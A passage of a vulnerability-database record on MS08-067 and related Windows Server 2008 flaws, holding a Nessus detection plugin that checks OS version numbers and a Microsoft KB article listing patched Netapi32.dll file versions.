(ret == 1)\n security_hole(port:port);\n else\n set_kb_item(name:\"SMB/KB958644/34477\", value:TRUE);\n NetUseDel();\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-09T12:01:26", "bulletinFamily": "scanner", "description": "According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.", "modified": "2019-11-02T00:00:00", "id": "WIN_SERVER_2008_NTLM_PCI.NASL", "href": "https://www.tenable.com/plugins/nessus/108811", "published": "2018-04-03T00:00:00", "title": "Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108811);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2008-0015\",\n \"CVE-2008-0020\",\n \"CVE-2008-4038\",\n \"CVE-2008-4114\",\n \"CVE-2008-4250\",\n \"CVE-2008-4609\",\n \"CVE-2008-4835\",\n \"CVE-2009-0086\",\n \"CVE-2009-0089\",\n \"CVE-2009-0550\",\n \"CVE-2009-0901\",\n \"CVE-2009-1925\",\n \"CVE-2009-1926\",\n \"CVE-2009-1930\",\n \"CVE-2009-2493\",\n \"CVE-2009-2494\",\n \"CVE-2009-2505\",\n \"CVE-2009-3676\",\n \"CVE-2009-3677\",\n \"CVE-2009-3678\",\n \"CVE-2010-0020\",\n \"CVE-2010-0021\",\n \"CVE-2010-0022\",\n \"CVE-2010-0231\",\n \"CVE-2010-0239\",\n \"CVE-2010-0240\",\n \"CVE-2010-0241\",\n \"CVE-2010-0242\",\n \"CVE-2010-0269\",\n \"CVE-2010-0270\",\n \"CVE-2010-0476\",\n \"CVE-2010-0477\",\n \"CVE-2010-1263\",\n \"CVE-2010-2550\",\n \"CVE-2010-2551\",\n \"CVE-2010-2552\"\n );\n script_bugtraq_id(\n 31179,\n 31545,\n 31647,\n 31874,\n 33121,\n 33122,\n 34435,\n 34437,\n 34439,\n 35558,\n 35585,\n 35828,\n 35832,\n 35982,\n 35993,\n 36265,\n 36269,\n 36989,\n 37197,\n 37198,\n 38049,\n 38051,\n 38054,\n 38061,\n 38062,\n 38063,\n 38064,\n 38085,\n 39312,\n 39336,\n 39339,\n 39340,\n 40237,\n 40574,\n 42224,\n 42263,\n 42267\n );\n script_xref(name:\"CERT\", value:\"827267\");\n script_xref(name:\"IAVA\", value:\"2008-A-0081\");\n script_xref(name:\"IAVA\", value:\"2009-A-0077\");\n script_xref(name:\"IAVA\", value:\"2009-A-0126\");\n script_xref(name:\"IAVA\", value:\"2010-A-0030\");\n script_xref(name:\"IAVB\", value:\"2009-B-0037\");\n script_xref(name:\"CERT\", value:\"180513\");\n script_xref(name:\"CERT\", value:\"456745\");\n script_xref(name:\"EDB-ID\", value:\"6463\");\n script_xref(name:\"EDB-ID\", value:\"6824\");\n script_xref(name:\"EDB-ID\", value:\"7104\");\n script_xref(name:\"EDB-ID\", value:\"7132\");\n script_xref(name:\"EDB-ID\", value:\"9108\");\n script_xref(name:\"EDB-ID\", value:\"16615\");\n script_xref(name:\"EDB-ID\", value:\"14607\");\n script_xref(name:\"MSFT\", value:\"MS08-063\");\n script_xref(name:\"MSFT\", value:\"MS08-067\");\n script_xref(name:\"MSFT\", value:\"MS09-001\");\n script_xref(name:\"MSFT\", value:\"MS09-013\");\n script_xref(name:\"MSFT\", value:\"MS09-037\");\n script_xref(name:\"MSFT\", value:\"MS09-042\");\n script_xref(name:\"MSFT\", value:\"MS09-048\");\n script_xref(name:\"MSFT\", value:\"MS09-071\");\n script_xref(name:\"MSFT\", value:\"MS10-009\");\n script_xref(name:\"MSFT\", value:\"MS10-012\");\n script_xref(name:\"MSFT\", value:\"MS10-020\");\n script_xref(name:\"MSFT\", value:\"MS10-043\");\n script_xref(name:\"MSFT\", value:\"MS10-054\");\n script_xref(name:\"MSFT\", value:\"MS10-083\");\n script_xref(name:\"MSKB\", value:\"957095\");\n script_xref(name:\"MSKB\", value:\"958644\");\n script_xref(name:\"MSKB\", value:\"958687\");\n script_xref(name:\"MSKB\", value:\"960803\");\n script_xref(name:\"MSKB\", value:\"967723\");\n script_xref(name:\"MSKB\", value:\"960859\");\n script_xref(name:\"MSKB\", value:\"973354\");\n script_xref(name:\"MSKB\", value:\"973507\");\n script_xref(name:\"MSKB\", value:\"973540\");\n script_xref(name:\"MSKB\", value:\"973815\");\n script_xref(name:\"MSKB\", value:\"973869\");\n script_xref(name:\"MSKB\", value:\"974318\");\n script_xref(name:\"MSKB\", value:\"971468\");\n script_xref(name:\"MSKB\", value:\"974145\");\n script_xref(name:\"MSKB\", value:\"980232\");\n script_xref(name:\"MSKB\", value:\"979687\");\n script_xref(name:\"MSKB\", value:\"982214\");\n script_xref(name:\"MSKB\", value:\"2032276\");\n\n script_name(english:\"Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)\");\n script_summary(english:\"Checks the OS version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host may allow remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version number obtained by NTLM the\nremote host has Windows Server 2008 installed. The host\nmay be vulnerable to a number of vulnerabilities including\nremote unauthenticated code execution.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure the appropriate patches have been applied.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2008-4038\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 94, 119, 189, 255, 264, 287, 310, 362, 399);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtp_ntlm_info.nasl\");\n script_require_keys(\"Settings/ParanoidReport\", \"Settings/PCI_DSS\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"audit.inc\");\n\nif (!get_kb_item(\"Settings/PCI_DSS\"))\n{\n audit(AUDIT_PCI);\n}\n\nif (report_paranoia < 2)\n{\n audit(AUDIT_PARANOID);\n}\n\nport = get_kb_item_or_exit(\"Services/smtp\");\nos_version = get_kb_item_or_exit(\"smtp/\"+port+\"/ntlm/host/os_version\");\nif (os_version != \"6.0.6001\")\n{\n audit(AUDIT_OS_SP_NOT_VULN);\n}\n\nsecurity_report_v4(severity:SECURITY_HOLE, port:port);\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-09-11T12:35:15", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves a vulnerability in the Server service that could allow remote code execution if a user received a specially crafted RPC request on an affected system.</p><h2></h2><div class=\"kb-notice-section section\"><span class=\"text-base\">Support for Windows Vista Service Pack 1 (SP1) ends on July 12, 2011. To continue receiving security updates for Windows, make sure you're running Windows Vista with Service Pack 2 (SP2). For more information, refer to this Microsoft web page: <a href=\"http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs\" id=\"kb-link-1\" target=\"_self\">Support is ending for some versions of Windows</a></span>.</div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\"><span><div class=\"kb-notice-section section\">This article discusses a beta release of a Microsoft product. The information in this article is provided as-is and is subject to change without notice.<br/><br/>No formal product support is available from Microsoft for this beta product. For information about how to obtain support for a beta release, see the documentation that is included with the beta product files, or check the Web location where you downloaded the release.</div></span><br/>Microsoft has released security bulletin MS08-067. To view the complete security bulletin, visit one of the following Microsoft Web sites:<br/><br/><ul class=\"sbody-free_list\"><li>Home users:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/protect/computer/updates/bulletins/200810.mspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/protect/computer/updates/bulletins/200810.mspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update Web site now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-3\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx</a></div></li></ul> <br/>This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-based systems, an attacker could exploit this vulnerability over RPC without authentication and could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If the crash in Svchost.exe occurs, the Server service will be affected. The Server service provides file, print, and named pipe sharing over the network.<br/><br/>The vulnerability is caused by the Server service, which does not correctly handle specially crafted RPC requests.<br/><br/><br/><br/><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-5\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-6\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-7\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-8\" target=\"_self\">International Support</a><br/><br/></span></div><h2></h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">File information</h3><a class=\"bookmark\" id=\"fileinfo\"></a>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time and with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.<br/><br/><br/><span class=\"text-base\">For all supported editions of Microsoft Windows 2000 Service Pack 4</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.0.2195.7203</td><td class=\"sbody-td\">310,032</td><td class=\"sbody-td\">18-Oct-2008</td><td class=\"sbody-td\">03:11</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">Windows XP and Windows Server 2003 file information notes</span><br/><ul class=\"sbody-free_list\"><li>The files that apply to a specific milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>) and service branch (QFE, GDR) are noted in the \"SP requirement\" and \"Service branch\" columns. </li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. QFE service branches contain hotfixes in addition to widely released fixes. </li><li>In addition to the files that are listed in these tables, this software update also installs an associated security catalog file (KB<strong class=\"sbody-strong\">number</strong>.cat) that is signed with a Microsoft digital signature. </li></ul><br/><span class=\"text-base\">For all supported x86-based versions of Windows XP</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.1.2600.3462</td><td class=\"sbody-td\">332,800</td><td class=\"sbody-td\">15-Oct-2008</td><td class=\"sbody-td\">16:57</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.1.2600.3462</td><td class=\"sbody-td\">339,456</td><td class=\"sbody-td\">15-Oct-2008</td><td class=\"sbody-td\">16:53</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.1.2600.5694</td><td class=\"sbody-td\">337,408</td><td class=\"sbody-td\">15-Oct-2008</td><td class=\"sbody-td\">16:34</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.1.2600.5694</td><td class=\"sbody-td\">339,456</td><td class=\"sbody-td\">15-Oct-2008</td><td class=\"sbody-td\">16:25</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr></table></div><br/><span class=\"text-base\">For all supported x64-based versions of Windows Server 2003 and of Windows XP Professional x64 edition</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">603,648</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">350,208</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1GDR\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">606,720</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">352,768</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">603,648</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">345,088</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">606,720</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">347,648</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:44</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><br/><span class=\"text-base\">For all supported x86-based versions of Windows Server 2003</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">350,208</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">20:09</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">352,768</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">21:47</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">345,088</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">22:18</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">347,648</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">23:37</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr></table></div><br/><span class=\"text-base\">For all supported IA-64-based versions of Windows Server 2003</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">905,216</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">350,208</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1GDR\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">910,848</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.3229</td><td class=\"sbody-td\">352,768</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">SP1QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">905,216</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">345,088</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2GDR\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">910,848</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wnetapi32.dll</td><td class=\"sbody-td\">5.2.3790.4392</td><td class=\"sbody-td\">347,648</td><td class=\"sbody-td\">17-Oct-2008</td><td class=\"sbody-td\">11:45</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><br/><span class=\"text-base\">Windows Vista, Microsoft Hyper-V Server 2008, and Windows Server 2008 file information notes</span><ul class=\"sbody-free_list\"><li>The files that apply to a specific product, milestone (RTM, SP<strong class=\"sbody-strong\">n</strong>), and service branch (LDR, GDR) can be identified by examining the file version numbers as shown in the following table:<br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Version</span></td><td class=\"sbody-td\"><span class=\"text-base\">Product</span></td><td class=\"sbody-td\"><span class=\"text-base\">Milestone</span></td><td class=\"sbody-td\"><span class=\"text-base\">Service branch</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<br/><span class=\"text-base\">0</span>.<br/><span class=\"text-base\">16</span>xxx</td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<br/><span class=\"text-base\">0</span>.<br/><span class=\"text-base\">20</span>xxx</td><td class=\"sbody-td\">Windows Vista</td><td class=\"sbody-td\">RTM</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<br/><span class=\"text-base\">1</span>.<br/><span class=\"text-base\">18</span>xxx</td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<br/><span class=\"text-base\">1</span>.<br/><span class=\"text-base\">22</span>xxx</td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>Service Pack 1 is integrated into the original release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000. <strong class=\"sbody-strong\">xxxxxx</strong> version number. </li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes. </li><li>The MANIFEST files (.manifest) and the MUM files (.mum) that are installed for each environment are <a bookmark-id=\"manifests\" href=\"#manifests\" managed-link=\"\" target=\"\">listed separately</a>. MUM and MANIFEST files, and the associated security catalog (.cat) files, are critical to maintaining the state of the updated component. The security catalog files (attributes not listed) are signed with a Microsoft digital signature. </li></ul><br/><span class=\"text-base\">For all supported x86-based versions of Windows Server 2008 and of Windows Vista</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.16764</td><td class=\"sbody-td\">425,472</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:40</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.20937</td><td class=\"sbody-td\">425,984</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.18157</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:47</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.22288</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:38</td><td class=\"sbody-td\">x86</td></tr></table></div><br/><span class=\"text-base\">For all supported x64-based versions of Windows Server 2008, Hyper-V Server 2008, and Windows Vista</span><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.16764</td><td class=\"sbody-td\">607,232</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.20937</td><td class=\"sbody-td\">606,720</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:28</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.18157</td><td class=\"sbody-td\">648,704</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">05:49</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.22288</td><td class=\"sbody-td\">648,704</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">05:02</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.16764</td><td class=\"sbody-td\">425,472</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:40</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6000.20937</td><td class=\"sbody-td\">425,984</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.18157</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td class=\"sbody-td\">04:47</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Netapi32.dll</td><td class=\"sbody-td\">6.0.6001.22288</td><td class=\"sbody-td\">466,944</td><td class=\"sbody-td\">16-Oct-2008</td><td 